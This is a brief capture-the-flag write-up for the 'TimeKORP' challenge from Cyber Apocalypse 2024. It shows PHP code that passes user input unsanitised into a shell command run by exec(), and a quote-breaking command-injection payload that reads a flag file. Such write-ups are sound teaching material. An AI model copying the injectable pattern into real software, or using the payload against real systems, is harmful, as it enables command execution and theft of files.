Cyber Apocalypse 2024
TimeKORP
Solved By : thewhiteh4t
- TimeModel.php is vulnerable
<?php
class TimeModel
{
public function __construct($format)
{
$this->command = "date '+" . $format . "' 2>&1";
}
public function getTime()
{
$time = exec($this->command);
$res = isset($time) ? $time : '?';
return $res;
}
}
- specifically :
$this->command = "date '+" . $format . "' 2>&1";
- we just need to match single quotes and insert cat command in between so payload becomes :
';cat /flag;'
